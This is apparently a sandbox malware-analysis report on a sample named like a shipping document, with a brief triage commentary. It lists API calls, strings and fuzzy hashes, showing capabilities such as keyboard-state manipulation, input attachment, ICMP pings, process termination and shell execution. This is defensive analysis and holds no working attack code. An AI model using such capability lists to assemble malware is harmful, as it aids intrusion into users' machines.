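Running `triage(parse_records(SAMPLE))` yields the keyboard-state record and the network record, with `None` as the pivot key for the truncated one. A category hit is a prompt, not a verdict: API sets like these recur in the runtime of a script interpreter statically linked into a sample, so the Instruction Fuzzy Hash, not the API list, is the field to compare against reports of known-clean interpreter builds before attributing the behaviour to the dropped payload.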
                    APIs
                    • WSAStartup.WSOCK32(00000101,?), ref: 00E758A9
                    • inet_addr.WSOCK32(?,?,?), ref: 00E758EE
                    • gethostbyname.WSOCK32(?), ref: 00E758FA
                    • IcmpCreateFile.IPHLPAPI ref: 00E75908
                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00E75978
                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00E7598E
                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00E75A03
                    • WSACleanup.WSOCK32 ref: 00E75A09
                    Similarity
                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                    • String ID: Ping
                    • API String ID: 1028309954-2246546115
                    • Opcode ID: 121eba232cb3f64398d818871086d83dc4cc826d38fa95f82e1ec28086cc03d6
                    • Instruction ID: 611de7b5cabe1c25cc0d15ec4a877f8d33dc5067d8593a7df0998a1dfe8bd86e
                    • Opcode Fuzzy Hash: 121eba232cb3f64398d818871086d83dc4cc826d38fa95f82e1ec28086cc03d6
                    • Instruction Fuzzy Hash: 8E517F32604700DFD7119F65CC85B2AB7E4AB88724F149929F9AAF72E1DB70EC44CB42
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 00E6B55C
                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00E6B5D2
                    • GetLastError.KERNEL32 ref: 00E6B5DC
                    • SetErrorMode.KERNEL32(00000000,READY), ref: 00E6B649
                    Similarity
                    • API ID: Error$Mode$DiskFreeLastSpace
                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                    • API String ID: 4194297153-14809454
                    • Opcode ID: cf8a6663394b8db99a78a25bc693c07afbf99e38c9ea872ef7bec41adf785286
                    • Instruction ID: 92621594e0976e3e27069a8cda74ac1d83e6f96f9b4fc8349d8cea8f79bf2674
                    • Opcode Fuzzy Hash: cf8a6663394b8db99a78a25bc693c07afbf99e38c9ea872ef7bec41adf785286
                    • Instruction Fuzzy Hash: 94319235A802099FCB10DF68E985EEE77B4FF04394F145065F516F7292DB709986CB90
                    APIs
                      • Part of subcall function 00E07F41: _memmove.LIBCMT ref: 00E07F82
                      • Part of subcall function 00E5AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00E5AEC7
                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00E592D6
                    • GetDlgCtrlID.USER32 ref: 00E592E1
                    • GetParent.USER32 ref: 00E592FD
                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E59300
                    • GetDlgCtrlID.USER32(?), ref: 00E59309
                    • GetParent.USER32(?), ref: 00E59325
                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00E59328
                    Similarity
                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 1536045017-1403004172
                    • Opcode ID: c03f73b0f45fc703e3b9513637f8a186bda6a40482cacc822955cf49b304354c
                    • Instruction ID: 15d6a888500cfd9ccf519cc77b03a34d8e8efd9e3f4abd42c15096e1531e3026
                    • Opcode Fuzzy Hash: c03f73b0f45fc703e3b9513637f8a186bda6a40482cacc822955cf49b304354c
                    • Instruction Fuzzy Hash: A921A174A00204BFDF04AB61CC859EEBBA4EF49310F101665F961B72E2DA755859DB20
                    APIs
                      • Part of subcall function 00E07F41: _memmove.LIBCMT ref: 00E07F82
                      • Part of subcall function 00E5AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00E5AEC7
                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00E593BF
                    • GetDlgCtrlID.USER32 ref: 00E593CA
                    • GetParent.USER32 ref: 00E593E6
                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E593E9
                    • GetDlgCtrlID.USER32(?), ref: 00E593F2
                    • GetParent.USER32(?), ref: 00E5940E
                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00E59411
                    Similarity
                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 1536045017-1403004172
                    • Opcode ID: fa6db13bbfe21d9f1e0071e6ef43d1edd18210e7da2e30542cd7726fbc6e152f
                    • Instruction ID: 03dbd8a1a115869df3e265a6782dd49bb78988c1c888d704d69b79b5662b5d63
                    • Opcode Fuzzy Hash: fa6db13bbfe21d9f1e0071e6ef43d1edd18210e7da2e30542cd7726fbc6e152f
                    • Instruction Fuzzy Hash: 7F21C470A00204BFDF04AB65CC85EFEBBB8EF48300F101525F961B72A2DB755959EB20
                    APIs
                    • GetParent.USER32 ref: 00E59431
                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00E59446
                    • _wcscmp.LIBCMT ref: 00E59458
                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00E594D3
                    Similarity
                    • API ID: ClassMessageNameParentSend_wcscmp
                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                    • API String ID: 1704125052-3381328864
                    • Opcode ID: 62250bd50565deee4f83059ac9f25048271d8a1e45ab3b0e90b4f62762a01597
                    • Instruction ID: 4ac9a3cd072d8695019745617afcba199c5331900db01a2b99da3c6cd91a662f
                    • Opcode Fuzzy Hash: 62250bd50565deee4f83059ac9f25048271d8a1e45ab3b0e90b4f62762a01597
                    • Instruction Fuzzy Hash: 26113636248317FAFA102630AC07DE7339C8B44325F206027FE24F04E2FA656C4A4A90
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 00E61521
                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00E60599,?,00000001), ref: 00E61535
                    • GetWindowThreadProcessId.USER32(00000000), ref: 00E6153C
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E60599,?,00000001), ref: 00E6154B
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E6155D
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E60599,?,00000001), ref: 00E61576
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E60599,?,00000001), ref: 00E61588
                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00E60599,?,00000001), ref: 00E615CD
                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00E60599,?,00000001), ref: 00E615E2
                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00E60599,?,00000001), ref: 00E615ED
                    Similarity
                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                    • String ID:
                    • API String ID: 2156557900-0
                    • Opcode ID: 2dc386e484973882847dec2259628060c36e802cf48b995c29f2765aa846e5c4
                    • Instruction ID: a4c0ca44e88595544b577e7881405d2eb285278d9651f816c6a39de6116c30c0
                    • Opcode Fuzzy Hash: 2dc386e484973882847dec2259628060c36e802cf48b995c29f2765aa846e5c4
                    • Instruction Fuzzy Hash: AD31F771640204BFDF129F52FC44F6AB7A9EF84355F14406AF817F61A0DB759D448B50
                    Similarity
                    • API ID: Variant$ClearInit$_memset
                    • String ID: ,,$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                    • API String ID: 2862541840-218231672
                    • Opcode ID: 84016a84103711a5cd0c9ab9ae89d997548bd09f718dd1194da350512920d132
                    • Instruction ID: 9a8718db6d3cc985956e717464e6d296f9c48b868d6dead4116bedda101c79d0
                    • Opcode Fuzzy Hash: 84016a84103711a5cd0c9ab9ae89d997548bd09f718dd1194da350512920d132
                    • Instruction Fuzzy Hash: E391AC70A00219ABDF24DFA5D884FAEBBB8EF45714F109159F519BB282D7709905CFA0
                    APIs
                    • EnumChildWindows.USER32(?,00E5A844), ref: 00E5A782
                    Similarity
                    • API ID: ChildEnumWindows
                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                    • API String ID: 3555792229-1603158881
                    • Opcode ID: 26d5fe1364e57bd65ef5dc02d8fc952580fc60629a87ec12f80fba0a77591ce4
                    • Instruction ID: bfbb8cc35c964cbf1207d1baa902ee2f2d9bd0e804976487bf0464f4c22a7703
                    • Opcode Fuzzy Hash: 26d5fe1364e57bd65ef5dc02d8fc952580fc60629a87ec12f80fba0a77591ce4
                    • Instruction Fuzzy Hash: 6591A570A00505ABCB08DF70C4D2BEAFBB5BF44305F18A62ADD99B7181DB70699DCB91
                    APIs
                    • SetWindowLongW.USER32(?,000000EB), ref: 00E02EAE
                      • Part of subcall function 00E01DB3: GetClientRect.USER32(?,?), ref: 00E01DDC
                      • Part of subcall function 00E01DB3: GetWindowRect.USER32(?,?), ref: 00E01E1D
                      • Part of subcall function 00E01DB3: ScreenToClient.USER32(?,?), ref: 00E01E45
                    • GetDC.USER32 ref: 00E3CEB2
                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00E3CEC5
                    • SelectObject.GDI32(00000000,00000000), ref: 00E3CED3
                    • SelectObject.GDI32(00000000,00000000), ref: 00E3CEE8
                    • ReleaseDC.USER32(?,00000000), ref: 00E3CEF0
                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00E3CF7B
                    Similarity
                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                    • String ID: U
                    • API String ID: 4009187628-3372436214
                    • Opcode ID: 11bec5c4d1bbc29b62e804b37f5b8a02a2faf8930a4d7e859e8c68c984f87e0a
                    • Instruction ID: c5ff6bbb54e6db0d7c7380ff0376b50656d27bd30d5d7232e020a266299643cb
                    • Opcode Fuzzy Hash: 11bec5c4d1bbc29b62e804b37f5b8a02a2faf8930a4d7e859e8c68c984f87e0a
                    • Instruction Fuzzy Hash: 56719131500205DFCF269F64C888ABA7BF6FF48314F24626AEE557A1A6C731D891DF60
                    APIs
                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00E8F910), ref: 00E78E3D
                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00E8F910), ref: 00E78E71
                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00E78FEB
                    • SysFreeString.OLEAUT32(?), ref: 00E79015
                    Similarity
                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                    • String ID:
                    • API String ID: 560350794-0
                    • Opcode ID: dac75b84e0996426df9965f2b5da2e7a85bc33d1f340127147090bd302cb0748
                    • Instruction ID: 0c04389887f4713b62eb6c9cd625018309b6bce91eb0386a4188adff0bf94053
                    • Opcode Fuzzy Hash: dac75b84e0996426df9965f2b5da2e7a85bc33d1f340127147090bd302cb0748
                    • Instruction Fuzzy Hash: E8F13A71A00109EFCB04DFA4C988EAEB7B9FF49315F109499F919BB251DB31AE45CB50
                    APIs
                    • _memset.LIBCMT ref: 00E7F7C9
                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E7F95C
                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E7F980
                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E7F9C0
                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E7F9E2
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E7FB5E
                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00E7FB90
                    • CloseHandle.KERNEL32(?), ref: 00E7FBBF
                    • CloseHandle.KERNEL32(?), ref: 00E7FC36
                    Similarity
                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                    • String ID:
                    • API String ID: 4090791747-0
                    • Opcode ID: c2682a958c99381dfff741e8b0077c09be8e9f8d4b1a80a88f94dbc571efa40b
                    • Instruction ID: 5a4f80d82bf07770fff346d74593b5a2ef0f9d4c7d78e78df9163d5eaf77cf14
                    • Opcode Fuzzy Hash: c2682a958c99381dfff741e8b0077c09be8e9f8d4b1a80a88f94dbc571efa40b
                    • Instruction Fuzzy Hash: CDE1C331604301DFDB14EF24D891B6ABBE0AF88354F14996DF899AB2A2CB30DC44CB52
                    APIs
                      • Part of subcall function 00E646AF: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E636DB,?), ref: 00E646CC
                      • Part of subcall function 00E646AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E636DB,?), ref: 00E646E5
                      • Part of subcall function 00E64AD8: GetFileAttributesW.KERNEL32(?,00E6374F), ref: 00E64AD9
                    • lstrcmpiW.KERNEL32(?,?), ref: 00E64DE7
                    • _wcscmp.LIBCMT ref: 00E64E01
                    • MoveFileW.KERNEL32(?,?), ref: 00E64E1C
                    Similarity
                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                    • String ID:
                    • API String ID: 793581249-0
                    • Opcode ID: d7c05a151ab9874e2bcb81eb09014fe6f15d582c85fb38230f1326e446334235
                    • Instruction ID: 06a67b40273ac2c1c0189697e42ae994b3979ba26e2afb9e57da386d121a3c4e
                    • Opcode Fuzzy Hash: d7c05a151ab9874e2bcb81eb09014fe6f15d582c85fb38230f1326e446334235
                    • Instruction Fuzzy Hash: F85157F25483859BC724DB90E8819DFB7ECEF84344F00292EF589E3191EF35A6888756
                    APIs
                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00E88731
                    Similarity
                    • API ID: InvalidateRect
                    • String ID:
                    • API String ID: 634782764-0
                    • Opcode ID: 9aec692591f7632b86362a1b57356650d2c587c2124c7d60823c06339f73c9f1
                    • Instruction ID: a5dca04ea5ea47f4490545dcac2cb2f735bf18b4334e395f48c12e7b3399a1ba
                    • Opcode Fuzzy Hash: 9aec692591f7632b86362a1b57356650d2c587c2124c7d60823c06339f73c9f1
                    • Instruction Fuzzy Hash: CE51B170500204FEEB24BB69CE89B993BA4AB05314FE06526FE5DF61E0DF71AD80DB51
                    APIs
                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00E3C477
                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E3C499
                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00E3C4B1
                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00E3C4CF
                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00E3C4F0
                    • DestroyIcon.USER32(00000000), ref: 00E3C4FF
                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00E3C51C
                    • DestroyIcon.USER32(?), ref: 00E3C52B
                      • Part of subcall function 00E8A4E1: DeleteObject.GDI32(00000000), ref: 00E8A51A
                    Similarity
                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                    • String ID:
                    • API String ID: 2819616528-0
                    • Opcode ID: 444224c0356ca445311caccc5ca57b29b42f1454d359d6bb919c52477bd23720
                    • Instruction ID: 6c1bc566da2f0ae1c0b27f148c863827ac004beb725e2ba5b4be0961ba06f538
                    • Opcode Fuzzy Hash: 444224c0356ca445311caccc5ca57b29b42f1454d359d6bb919c52477bd23720
                    • Instruction Fuzzy Hash: 83518770600209AFDB24DF25DC89FAA7BE5EB58314F201129FA16B72E0D771ED91DB50
                    APIs
                      • Part of subcall function 00E5AC37: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E5AC57
                      • Part of subcall function 00E5AC37: GetCurrentThreadId.KERNEL32 ref: 00E5AC5E
                      • Part of subcall function 00E5AC37: AttachThreadInput.USER32(00000000,?,00E59945,?,00000001), ref: 00E5AC65
                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E59950
                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00E5996D
                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00E59970
                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E59979
                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00E59997
                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00E5999A
                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E599A3
                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00E599BA
                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00E599BD
                    Similarity
                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                    APIs
                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00E58864,00000B00,?,?), ref: 00E58BEC
                    • HeapAlloc.KERNEL32(00000000,?,00E58864,00000B00,?,?), ref: 00E58BF3
                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E58864,00000B00,?,?), ref: 00E58C08
                    • GetCurrentProcess.KERNEL32(?,00000000,?,00E58864,00000B00,?,?), ref: 00E58C10
                    • DuplicateHandle.KERNEL32(00000000,?,00E58864,00000B00,?,?), ref: 00E58C13
                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00E58864,00000B00,?,?), ref: 00E58C23
                    • GetCurrentProcess.KERNEL32(00E58864,00000000,?,00E58864,00000B00,?,?), ref: 00E58C2B
                    • DuplicateHandle.KERNEL32(00000000,?,00E58864,00000B00,?,?), ref: 00E58C2E
                    • CreateThread.KERNEL32(00000000,00000000,00E58C54,00000000,00000000,00000000), ref: 00E58C48
                    Similarity
                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                    APIs
                      • Part of subcall function 00E57432: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E5736C,80070057,?,?,?,00E5777D), ref: 00E5744F
                      • Part of subcall function 00E57432: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E5736C,80070057,?,?), ref: 00E5746A
                      • Part of subcall function 00E57432: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E5736C,80070057,?,?), ref: 00E57478
                      • Part of subcall function 00E57432: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E5736C,80070057,?), ref: 00E57488
                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00E7991B
                    • _memset.LIBCMT ref: 00E79928
                    • _memset.LIBCMT ref: 00E79A6B
                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00E79A97
                    • CoTaskMemFree.OLE32(?), ref: 00E79AA2
                    Strings
                    • NULL Pointer assignment, xrefs: 00E79AF0
                    Similarity
                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                    • String ID: NULL Pointer assignment
                    APIs
                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00E86E56
                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 00E86E6A
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00E86E84
                    • _wcscat.LIBCMT ref: 00E86EDF
                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00E86EF6
                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00E86F24
                    Similarity
                    • API ID: MessageSend$Window_wcscat
                    • String ID: SysListView32
                    APIs
                      • Part of subcall function 00E63C99: CreateToolhelp32Snapshot.KERNEL32 ref: 00E63CBE
                      • Part of subcall function 00E63C99: Process32FirstW.KERNEL32(00000000,?), ref: 00E63CCC
                      • Part of subcall function 00E63C99: CloseHandle.KERNEL32(00000000), ref: 00E63D96
                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E7EAB8
                    • GetLastError.KERNEL32 ref: 00E7EACB
                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E7EAFA
                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E7EB77
                    • GetLastError.KERNEL32(00000000), ref: 00E7EB82
                    • CloseHandle.KERNEL32(00000000), ref: 00E7EBB7
                    Similarity
                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                    • String ID: SeDebugPrivilege
                    APIs
                    • LoadIconW.USER32(00000000,00007F03), ref: 00E630CD
                    Similarity
                    • API ID: IconLoad
                    • String ID: blank$info$question$stop$warning
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00E64353
                    • LoadStringW.USER32(00000000), ref: 00E6435A
                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00E64370
                    • LoadStringW.USER32(00000000), ref: 00E64377
                    • _wprintf.LIBCMT ref: 00E6439D
                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E643BB
                    Strings
                    • %s (%d) : ==> %s: %s %s, xrefs: 00E64398
                    Similarity
                    • API ID: HandleLoadModuleString$Message_wprintf
                    • String ID: %s (%d) : ==> %s: %s %s
                    APIs
                      • Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623
                    • GetSystemMetrics.USER32(0000000F), ref: 00E8D4E6
                    • GetSystemMetrics.USER32(0000000F), ref: 00E8D506
                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00E8D741
                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00E8D75F
                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00E8D780
                    • ShowWindow.USER32(00000003,00000000), ref: 00E8D79F
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00E8D7C4
                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 00E8D7E7
                    Similarity
                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                    APIs
                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00E3C347,00000004,00000000,00000000,00000000), ref: 00E02ACF
                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00E3C347,00000004,00000000,00000000,00000000,000000FF), ref: 00E02B17
                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00E3C347,00000004,00000000,00000000,00000000), ref: 00E3C39A
                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00E3C347,00000004,00000000,00000000,00000000), ref: 00E3C406
                    Similarity
                    • API ID: ShowWindow
                    APIs
                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 00E67186
                      • Part of subcall function 00E20F36: std::exception::exception.LIBCMT ref: 00E20F6C
                      • Part of subcall function 00E20F36: __CxxThrowException@8.LIBCMT ref: 00E20F81
                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00E671BD
                    • EnterCriticalSection.KERNEL32(?), ref: 00E671D9
                    • _memmove.LIBCMT ref: 00E67227
                    • _memmove.LIBCMT ref: 00E67244
                    • LeaveCriticalSection.KERNEL32(?), ref: 00E67253
                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00E67268
                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E67287
                    Similarity
                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                    APIs
                    • DeleteObject.GDI32(00000000), ref: 00E8621D
                    • GetDC.USER32(00000000), ref: 00E86225
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E86230
                    • ReleaseDC.USER32(00000000,00000000), ref: 00E8623C
                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00E86278
                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00E86289
                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00E8905C,?,?,000000FF,00000000,?,000000FF,?), ref: 00E862C3
                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00E862E3
                    Similarity
                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                    APIs
                      • Part of subcall function 00E09997: __itow.LIBCMT ref: 00E099C2
                      • Part of subcall function 00E09997: __swprintf.LIBCMT ref: 00E09A0C
                      • Part of subcall function 00E1FE06: _wcscpy.LIBCMT ref: 00E1FE29
                    • _wcstok.LIBCMT ref: 00E6ED20
                    • _wcscpy.LIBCMT ref: 00E6EDAF
                    • _memset.LIBCMT ref: 00E6EDE2
                    Similarity
                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                    • String ID: X
                    APIs
                    • IsWindow.USER32(00FC5FB0), ref: 00E8B41F
                    • IsWindowEnabled.USER32(00FC5FB0), ref: 00E8B42B
                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00E8B50F
                    • SendMessageW.USER32(00FC5FB0,000000B0,?,?), ref: 00E8B546
                    • IsDlgButtonChecked.USER32(?,?), ref: 00E8B583
                    • GetWindowLongW.USER32(00FC5FB0,000000EC), ref: 00E8B5A5
                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00E8B5BD
                    Similarity
                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                    APIs
                    • _memset.LIBCMT ref: 00E7F55C
                    • _memset.LIBCMT ref: 00E7F625
                    • ShellExecuteExW.SHELL32(?), ref: 00E7F66A
                      • Part of subcall function 00E09997: __itow.LIBCMT ref: 00E099C2
                      • Part of subcall function 00E09997: __swprintf.LIBCMT ref: 00E09A0C
                      • Part of subcall function 00E1FE06: _wcscpy.LIBCMT ref: 00E1FE29
                    • GetProcessId.KERNEL32(00000000), ref: 00E7F6E1
                    • CloseHandle.KERNEL32(00000000), ref: 00E7F710
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                    • String ID: @
                    • API String ID: 3522835683-2766056989
                    • Opcode ID: babe7abb31d4c83a118ffd721afdb30a17767b0c9f788a5b830252cf9d6fd854
                    • Instruction ID: fc1680c0a34a9de27abdd43b53d58980097b32a6d2c8e2a8ad29587838a30b34
                    • Opcode Fuzzy Hash: babe7abb31d4c83a118ffd721afdb30a17767b0c9f788a5b830252cf9d6fd854
                    • Instruction Fuzzy Hash: 35615F75A00619DFCB14DF94C5819AEBBF5FF48314F149469E85ABB3A2CB30AD41CB90
                    APIs
                    • GetParent.USER32(?), ref: 00E612BD
                    • GetKeyboardState.USER32(?), ref: 00E612D2
                    • SetKeyboardState.USER32(?), ref: 00E61333
                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00E61361
                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00E61380
                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00E613C6
                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00E613E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessagePost$KeyboardState$Parent
                    • String ID:
                    • API String ID: 87235514-0
                    • Opcode ID: 7a37ddd72d2ef895ad7b7b0f47a4bc2ee7463f99e252cfba6409eb2ff47999dc
                    • Instruction ID: b30bf3fdde7bd3f58886fe3cf31b6c1adc626d6810dbfc6eff5e82a41119d4b2
                    • Opcode Fuzzy Hash: 7a37ddd72d2ef895ad7b7b0f47a4bc2ee7463f99e252cfba6409eb2ff47999dc
                    • Instruction Fuzzy Hash: 435106A09847D13EFB3342349C45BBABEE95B06388F0C65C9E0D6668C2C6D89CC4E751
                    APIs
                    • GetParent.USER32(00000000), ref: 00E610D6
                    • GetKeyboardState.USER32(?), ref: 00E610EB
                    • SetKeyboardState.USER32(?), ref: 00E6114C
                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00E61178
                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00E61195
                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00E611D9
                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00E611FA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
